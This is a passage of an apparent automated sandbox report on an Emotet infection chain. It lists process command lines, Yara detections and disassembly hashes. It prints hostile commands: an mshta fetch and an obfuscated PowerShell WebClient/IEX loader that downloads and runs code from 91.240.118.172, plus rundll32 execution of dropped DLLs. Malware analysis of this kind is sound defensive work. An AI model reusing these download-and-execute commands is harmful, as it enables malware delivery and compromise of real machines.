                                                                                                                    Imagebase:0x13f7b0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:18:20
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Imagebase:0x4aa90000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:18:21
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Imagebase:0x13fa50000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:18:24
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13ff60000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:18:59
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                    Imagebase:0x4a6d0000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:18:59
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:19:03
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:19:26
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:13
                                                                                                                    Start time:21:19:31
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:19:53
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:19:58
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Executed Functions

                                                                                                                      Function 03881CD4 Relevance: .4, Instructions: 430COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419544198.0000000003881000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction ID: c60dd6c440bdc1258c8ddb65af26dfd0bd1898c609ce320b1fe356459cb52c7b
                                                                                                                      • Opcode Fuzzy Hash: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction Fuzzy Hash: 26D1D33061CA8D4FCB59EB6C8554624BBE1FF5D348B5849EEE48AC7293DA20CC81C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03881CD4 Relevance: .4, Instructions: 430COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419544198.0000000003881000.00000010.00000800.00020000.00000000.sdmp, Offset: 03881000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction ID: c60dd6c440bdc1258c8ddb65af26dfd0bd1898c609ce320b1fe356459cb52c7b
                                                                                                                      • Opcode Fuzzy Hash: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction Fuzzy Hash: 26D1D33061CA8D4FCB59EB6C8554624BBE1FF5D348B5849EEE48AC7293DA20CC81C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03883116 Relevance: .2, Instructions: 228COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction ID: 21a7dd4f983d6645829d69e40e1d60f50fd11cc21139ac54f47c6b6754d104ca
                                                                                                                      • Opcode Fuzzy Hash: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction Fuzzy Hash: 4251072471CA4C4FCB4DEB5C9855A20B7D1FB9D704F4880EEE48AC72A2DA64CC81C792
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03883116 Relevance: .2, Instructions: 228COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03883000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction ID: 21a7dd4f983d6645829d69e40e1d60f50fd11cc21139ac54f47c6b6754d104ca
                                                                                                                      • Opcode Fuzzy Hash: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction Fuzzy Hash: 4251072471CA4C4FCB4DEB5C9855A20B7D1FB9D704F4880EEE48AC72A2DA64CC81C792
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0388330C Relevance: .0, Instructions: 14COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction ID: 01cc9a7285952cdd795b0de68656487d61f820294ca7d23b41ab1ad372f5e4b2
                                                                                                                      • Opcode Fuzzy Hash: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction Fuzzy Hash: A9D012291097C44FD356B7B914254283A61DA166CD31810C79587DF253C9004D518753
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0388330C Relevance: .0, Instructions: 14COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03883000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction ID: 01cc9a7285952cdd795b0de68656487d61f820294ca7d23b41ab1ad372f5e4b2
                                                                                                                      • Opcode Fuzzy Hash: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction Fuzzy Hash: A9D012291097C44FD356B7B914254283A61DA166CD31810C79587DF253C9004D518753
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
